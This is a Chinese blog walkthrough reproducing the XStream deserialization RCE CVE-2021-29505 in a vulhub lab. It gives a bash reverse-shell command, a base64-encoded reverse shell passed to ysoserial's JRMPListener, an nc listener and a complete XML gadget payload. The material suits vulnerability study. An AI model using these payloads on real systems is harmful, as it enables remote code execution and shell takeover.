XStream反序列化命令执行漏洞复现(CVE-2021-29505)

XStream反序列化命令执行漏洞复现(CVE-2021-29505)


讲道理正经来讲这个实验需要四台机器模拟,不过条件有限,我就用两台机器模拟了。
我们需要一台攻击机
一台安装了xstream服务的机器
一台安装了RMI服务的机器
一台机器接收shell
这里我的攻击机是我的物理机(192.168.0.103),其他的三台机器全部由虚拟机代替了(192.168.248.163)
首先我们需要搭建漏洞环境
直接从vulhub上面克隆我们的漏洞环境,详情自行百度
然后进入我们要复现的漏洞的路径,运行
docker-compose up -d
等待我们环境搭建完毕

在这里插入图片描述
大概就是这么个效果,然后docker ps看一下刚刚运行的容器
在这里插入图片描述
可以看淡映射的主机端口,我们在我们的攻击机上访问一下
在这里插入图片描述
大概就是这么个效果。
然后我们在我们的虚拟机上搭建一个RMI服务器,也就是远程方法接口
这里我们使用神奇ysoserial,工具自行github
我们需要运行的方法是这一句

bash -i >& /dev/tcp/ip/port 0>&1

然后再这个网站上编码一下

http://www.jackson-t.ca/runtime-exec-payloads.html

在这里插入图片描述
箭头指的部分就是我们需要的payload
然后我们在我们的RMI服务器上运行

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 2256 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OC4xNjMvOTk5OSAwPiYx}|{base64,-d}|{bsh,-i}"

引号里面的部分就是你上一步编码的内容,2256就是监听的端口,可以自定义在这里插入图片描述
上图是监听成功的样子
然后在我们的就收shell的服务器上也就是你上一步生成payload填写的ip的那天设备上监听对应的端口

nc -lvvp 9999

然后我们通过burpsuite抓到访问xstream服务首页的数据包。
在这里插入图片描述
把请求类型改成post,content-type改为xml
然后再请求体中粘贴下面这一串

<java.util.PriorityQueue serialization='custom'> <unserializable-parents/>

<java.util.PriorityQueue>

<default>

<size>2</size>

</default>

<int>3</int>

<javax.naming.ldap.Rdn_-RdnEntry>

<type>12345</type>

<value class='com.sun.org.apache.xpath.internal.objects.XString'>

<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>

</value>

</javax.naming.ldap.Rdn_-RdnEntry>

<javax.naming.ldap.Rdn_-RdnEntry>

<type>12345</type>

<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>

<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>

<parsedMessage>true</parsedMessage>

<soapVersion>SOAP_11</soapVersion>

<bodyParts/>

<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>

<attachmentsInitialized>false</attachmentsInitialized>

<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>

<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>

<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>

<names>

<string>aa</string>

<string>aa</string>

</names>

<ctx>

<environment/>

<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>

<java.rmi.server.RemoteObject>

<string>UnicastRef</string>

<string>192.168.248.163</string>

<int>2256</int>

<long>0</long>

<int>0</int>

<long>0</long>

<short>0</short>

<boolean>false</boolean>

</java.rmi.server.RemoteObject>

</registry>

<host>192.168.248.163</host>

<port>2256</port>

</ctx>

</candidates>

</aliases>

</nullIter>

</sm>

</message>

</value>

</javax.naming.ldap.Rdn_-RdnEntry>

</java.util.PriorityQueue>

</java.util.PriorityQueue>

上面涉及到ip与端口的地方均修改为你RMI服务器的对应ip与端口
在这里插入图片描述
然后发送,看到响应了500的返回值
在这里插入图片描述
在看看我们RMI服务器打印的日志
在这里插入图片描述
基本可以确定利用成功了
再看看我们的监听
在这里插入图片描述
嗯,很不错呢!!成功复现。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值